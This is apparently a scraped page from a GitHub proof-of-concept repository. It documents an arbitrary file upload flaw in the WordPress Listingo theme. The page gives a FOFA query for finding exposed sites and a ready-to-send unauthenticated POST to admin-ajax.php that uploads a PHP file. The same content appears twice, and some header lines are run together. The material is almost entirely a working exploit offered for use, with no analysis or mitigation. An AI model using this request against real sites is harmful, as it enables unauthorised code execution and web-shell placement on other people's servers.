POC/wpoc/WordPress/wordpress listingo 文件上传漏洞.md

##  wordpress listingo 文件上传漏洞

## fofa
```
body="wp-content/themes/listingo"
```

## poc
```
POST /wp-admin/admin-ajax.php?action=listingo_temp_uploader HTTP/1.1
Host: targetUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8rVjnfcgxgKoytcgAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 531

------WebKitFormBoundary8rVjnfcgxgKoytcg
Content-Disposition: form-data; name="listingo_uploader";filename="1008.php"
Content-Type:text/php

<?phpphpinfo();?>
------WebKitFormBoundary8rVjnfcgxgKoytcg
Content-Disposition: form-data; name="submit"

Start Uploader
------WebKitFormBoundary8rVjnfcgxgKoytcg--
```
![image](https://github.com/wy876/POC/assets/139549762/8b115456-bcbe-4d0f-b51d-add3dcf0db78)
first commit 2025-03-04 23:12:57 +08:00			`## wordpress listingo 文件上传漏洞`

			`## fofa`
			```
			`body="wp-content/themes/listingo"`
			```

			`## poc`
			```
			`POST /wp-admin/admin-ajax.php?action=listingo_temp_uploader HTTP/1.1`
			`Host: targetUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8rVjnfcgxgKoytcgAccept-Encoding: gzip, deflate`
			`Accept-Language: zh-CN,zh;q=0.9`
			`Content-Length: 531`

			`------WebKitFormBoundary8rVjnfcgxgKoytcg`
			`Content-Disposition: form-data; name="listingo_uploader";filename="1008.php"`
			`Content-Type:text/php`

			`<?phpphpinfo();?>`
			`------WebKitFormBoundary8rVjnfcgxgKoytcg`
			`Content-Disposition: form-data; name="submit"`

			`Start Uploader`
			`------WebKitFormBoundary8rVjnfcgxgKoytcg--`
			```
			`![image](https://github.com/wy876/POC/assets/139549762/8b115456-bcbe-4d0f-b51d-add3dcf0db78)`